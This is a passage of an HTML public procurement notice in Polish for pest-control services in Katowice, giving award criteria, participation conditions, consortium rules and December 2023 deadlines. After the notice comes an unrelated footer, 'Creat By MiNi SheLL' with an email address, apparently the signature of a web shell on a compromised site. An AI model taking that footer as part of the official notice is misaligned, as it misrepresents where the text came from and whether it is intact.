ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejsza oferta według kryteriów określonych w SWZ (Rozdział<br/>XVIII &#34;Opis kryteriów oceny ofert i sposobu oceny ofert&#34;)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Wg kolejności </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu, określone przez Zamawiającego zgodnie z art. 112 ust. 2 pkt 4 ustawy w zakresie zdolności technicznej lub zawodowej:<br/>1) Wykonawca musi wykazać, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje należycie co najmniej jedną usługę polegającą na świadczeniu usług z zakresu deratyzacji lub/i dezynsekcji lub/i dezynfekcji lub/i dezodoryzacji o łącznej wartości nie mniejszej niż 100.000,00 zł brutto (dla jednego Zamawiającego).<br/>UWAGA:<br/>a) W przypadku wykonywania i nie zakończenia świadczenia usługi/usług wykonawca zobowiązany jest podać w wykazie usług, jaką wartość ma/ją usługa/i zrealizowana/e, do momentu upływu terminu składania ofert z tym, że wartość wykonanej/ych usług/i nie może być mniejsza niż 100 000,00 zł brutto dla jednego Zamawiającego;<br/>b) Przez jedną usługę Zamawiający rozumie wykonanie/wykonywanie usługi/usług dla jednego Zmawiającego w ramach jednej/kilku umowy/umów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona w celu wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia (Rozdział VIII pkt 2 SWZ) zostanie wezwany do przedłożenia następujących podmiotowych środków dowodowych, aktualnych na dzień złożenia:<br/>oświadczenia w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 ze zm.), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej; Ww. oświadczenie składa każdy z Wykonawców wspólnie składających ofertę;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona w celu wykazania potwierdzenia spełniania warunków udziału w postępowaniu (Rozdział VIII pkt 2 i 3 SWZ) zostanie wezwany do przedłożenia następujących podmiotowych środków dowodowych, aktualnych na dzień złożenia:<br/>wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym celu Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/> 2. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców składających wspólną ofertę.<br/> 3. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub pełnomocnika).<br/> 4. Wykonawcy wspólnie ubiegający się o zamówienie, przedłożą wraz z ofertą:<br/> 1) stosowne pełnomocnictwo – zgodnie z Rozdziałem XV SWZ – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. <br/> UWAGA: Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy podmiotów składających wspólnie ofertę<br/> 2) oświadczenie, o którym mowa w art. 125 ustawy (Rozdział XV pkt 2 ppkt 1 SWZ) oraz oświadczenie, o którym mowa w Rozdziale XV pkt 2 ppkt 5 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż:<br/> b) Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/> c) Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie.<br/> 3) oświadczenie, z którego wynika, które roboty, usługi lub dostawy wykonają poszczególni wykonawcy, w sytuacji określonej w art. 117 ust. 2 i 3 ustawy.<br/> 5. Zasady rozliczania prac pomiędzy Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia, w tym zasady wystawiania faktur na rzecz Zamawiającego, należy określić w umowie regulującej współpracę tych Wykonawców, przy czym:<br/> 1) Zamawiający zaleca, aby podmiotem uprawnionym do wystawiania faktur na rzecz Zamawiającego, przyjmowania płatności i dokonywania rozliczeń był Lider* Konsorcjum**<br/> 2) Zamawiający dopuszcza, aby faktury na rzecz Zamawiającego, były wystawiane przez poszczególnych członków Konsorcjum, pod warunkiem, że umowa Konsorcjum będzie zawierać odpowiednie zapisy w tym zakresie i wskazywać zakres prac wykonywanych przez poszczególnych członków Konsorcjum.<br/> 6. W przypadku, gdy umowa regulująca współpracę Wykonawców wspólnie ubiegających się o zamówienia, nie będzie zawierała zasad rozliczania prac pomiędzy tymi Wykonawcami, w tym zasad wystawiania faktur na rzecz Zamawiającego, Zamawiający przyjmie, że jedynym Wykonawcą uprawnionym do wystawiania faktur będzie Lider* Konsorcjum**.<br/> * Wykonawca wskazany jako pełnomocnik lub jeden z Wykonawców (wskazany przez pozostałych) wspólnie ubiegających się o zamówienie<br/> ** Wykonawcy występujący wspólnie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian umowy, których charakter oraz warunki wprowadzania są określone w projektowanych postanowieniach umowy w szczególności w § 14 projektowanych postanowień umowy stanowiących Załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/kzgm_katowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-11 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcę wyklucza się w przypadkach określonych w art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego (Dz.U. 2022 poz. 835) zwanej dalej Ustawą Przeciw Agresji.

Creat By MiNi SheLL
Email: jattceo@gmail.com